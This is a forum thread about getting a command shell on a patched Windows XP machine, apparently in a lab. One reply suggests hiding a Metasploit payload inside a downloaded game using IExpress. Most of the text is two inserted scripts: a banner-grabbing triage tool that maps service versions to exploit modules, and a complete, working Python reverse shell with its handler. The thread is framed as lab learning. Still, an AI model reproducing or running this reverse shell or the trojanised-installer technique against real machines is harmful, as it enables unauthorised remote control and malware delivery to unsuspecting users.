Hello all,
I was just wondering what the best exploit and payload would be for getting a command shell on a Windows XP SP2/SP3 machine. The XP machine would be assumed to be current with updates...
I find it quite a challenge as every attempt I have tried returned with no session...
If you're attacking the OS directly and it's fully patched (ex: ms08-067) you will have no luck. You will have to look at either attacking installed applications (ftp, smtp, etc) or look into a client side attack.
If the machine is patched then the "best" exploit would likely be one that doesn't exist yet which leverages a vulnerability which hasn't been identified yet.
I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.
I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
Ok, say I rigged my VM of Windows XP so that it has been fully patched but oops, I forgot to close ports 21 and 80. Could these be "metasploited"?
The easiest way to set up your VM lab with minimal work would be to match an exploit in Metasploit, and install the vulnerable software on your target machine.
You can find some vulnerable software here: Download old vulnerable softwares version
Also you might want to look at: http://www.offensive-security.com/metasploit-unleashed/
Ok, I'm in a good mood so I'll spoon feed
IT/Security 101.....
An exploit takes advantage of a weakness (also known as a vulnerability), patches correct vulnerabilities.
If a vulnerability exists within the service running/listening on a particular port (21 or 80) then yes it can be exploited. Assuming a) it's a brand new vulnerability that you've discovered (for which there is no patch [yet]) or b) it's an old vulnerability which has not had the corresponding and correcting patch applied.
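The two replies above (match installed software to a Metasploit module; a listening port is only exploitable if the service behind it has an unpatched bug) boil down to one triage step: read what the service on 21 and 80 says about itself, then check whether that product and version is one you have an exploit for. The script below is an added illustration of that step, not code from any poster or from Metasploit. The banners and the product names in it are constructed for an offline run, and the module paths in LAB_CATALOG are placeholders standing in for whatever module you picked from `search` in msfconsole; they are not real Metasploit module names.

```python
import re
import socket

# Constructed sample banners for an offline run (not captured from a real host).
SAMPLE_BANNERS = {
    21: b"220 ExampleFTPd 1.2.3 Server ready.\r\n",
    80: b"HTTP/1.1 200 OK\r\nServer: ExampleHTTPd/4.5.6 (Win32)\r\nContent-Length: 0\r\n\r\n",
}

# Hypothetical lab inventory: product -> (last affected version, module you chose
# for it). Product and module names are placeholders, not real software or modules.
LAB_CATALOG = {
    "ExampleFTPd": ("1.2.3", "exploit/windows/ftp/exampleftpd_user"),
    "ExampleHTTPd": ("4.0.0", "exploit/windows/http/examplehttpd_get"),
}

# FTP greets first: "220 <product> <version> ...". HTTP answers with a Server: header.
FTP_RE = re.compile(rb"^220[ -]+(?P<product>[A-Za-z][\w-]*)\s+v?(?P<version>\d+(?:\.\d+)+)")
HTTP_RE = re.compile(rb"^Server:\s*(?P<product>[^/\r\n]+)/(?P<version>\d+(?:\.\d+)*)", re.M)


def grab_banner(host, port, timeout=3.0):
    """Connect to a live service and return the first bytes it sends.
    HTTP does not talk first, so a minimal HEAD request is sent on port 80."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port == 80:
            s.sendall(b"HEAD / HTTP/1.0\r\nHost: " + host.encode() + b"\r\n\r\n")
        return s.recv(1024)


def fingerprint(port, banner):
    """Return (product, version) parsed from the banner, or None if unrecognised."""
    m = (FTP_RE if port == 21 else HTTP_RE).search(banner)
    if not m:
        return None
    return m.group("product").decode(), m.group("version").decode()


def version_tuple(v):
    """'1.10.2' -> (1, 10, 2) so that versions compare numerically, not as strings."""
    return tuple(int(x) for x in v.split("."))


def candidate_module(product, version, catalog=LAB_CATALOG):
    """Return the catalogued module if the observed version is still affected.
    A version newer than the last affected one is the 'patched' case: no match."""
    entry = catalog.get(product)
    if entry is None:
        return None
    last_affected, module = entry
    return module if version_tuple(version) <= version_tuple(last_affected) else None


def triage(banners, catalog=LAB_CATALOG):
    """Map each port to (service description, module or None)."""
    results = {}
    for port, banner in banners.items():
        fp = fingerprint(port, banner)
        if fp is None:
            results[port] = ("unknown", None)
            continue
        product, version = fp
        results[port] = (f"{product} {version}", candidate_module(product, version, catalog))
    return results


if __name__ == "__main__":
    # Offline run against the constructed banners; swap in grab_banner() for a lab VM.
    for port, (svc, mod) in triage(SAMPLE_BANNERS).items():
        print(f"{port}/tcp {svc}: {mod or 'no matching module'}")
```

In the constructed data the FTP daemon is at the last affected version and gets a module, while the web server is newer than anything in the catalog and gets nothing, which is exactly the "fully patched" situation the thread is about: the listening port by itself buys you nothing without a bug in the version behind it.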
Great,
Thank you all for clearing up the fog in my brain relating to exploits!
The best way to exploit a fully patched Windows XP is to create a payload with Metasploit, attach that payload using your friendly Microsoft IExpress to a nice little fun game you download off the web, then send it and execute it on your test VM. When you run the game and close it, the Metasploit payload will be executed.
OR!! You can use browser exploits: you can use Metasploit to act as a website, and just browse to your machine and hopefully, pop, you have a command shell. If you've got wireless, check out Karmetasploit.
hope this helps.
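What makes the client-side route in the post above work on a patched box is the direction of the connection: the payload runs on the target and connects out to a handler you are listening with, so nothing needs to be reachable on the target. The script below is an added example of that model with both sides in plain Python on one machine; it is not the poster's code and not Metasploit's payload or multi/handler, only a stand-in that shows the same exchange. It assumes a loopback address and a free port picked at run time, and is meant for a lab VM, nothing else.

```python
import socket
import subprocess
import threading


def reverse_shell(host, port):
    """Payload side (would run on the target): connect OUT to the handler,
    run each line it sends as a command, and ship the output back.
    Each reply is terminated with a NUL byte so the handler knows where it ends."""
    with socket.create_connection((host, port), timeout=10) as s:
        rfile = s.makefile("rb")
        while True:
            line = rfile.readline()
            if not line or line.strip() == b"exit":
                return
            proc = subprocess.run(line.decode().strip(), shell=True,
                                  capture_output=True, timeout=10)
            s.sendall(proc.stdout + proc.stderr + b"\x00")


def recv_reply(conn):
    """Handler side: read until the NUL terminator of one command's output."""
    buf = b""
    while not buf.endswith(b"\x00"):
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.rstrip(b"\x00")


def run_handler(commands, host="127.0.0.1"):
    """Handler side (what multi/handler does for you): listen, wait for the
    callback, drive commands over it, and return each command's output.
    The payload stub is started in a thread so the whole exchange runs locally."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))            # port 0: let the OS pick a free port (assumption: loopback lab)
    port = srv.getsockname()[1]
    srv.listen(1)
    srv.settimeout(10)

    target = threading.Thread(target=reverse_shell, args=(host, port), daemon=True)
    target.start()                 # "victim runs the game": payload calls back

    conn, _peer = srv.accept()     # this is the session the thread starter never got
    outputs = []
    with conn:
        conn.settimeout(10)
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            outputs.append(recv_reply(conn))
        conn.sendall(b"exit\n")
    target.join(10)
    srv.close()
    return outputs


if __name__ == "__main__":
    for out in run_handler(["echo hello from the target", "whoami"]):
        print(out.decode(errors="replace").rstrip())
```

The firewall logic is the whole point: an inbound exploit against port 21 or 80 needs a vulnerable listener, while this stub only needs the target to be allowed to make an outbound TCP connection, which a default XP box is. Metasploit's windows/shell/reverse_tcp and windows/meterpreter/reverse_tcp payloads follow the same shape, with multi/handler on the listening side.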
That helps more than you know. Thank you very much!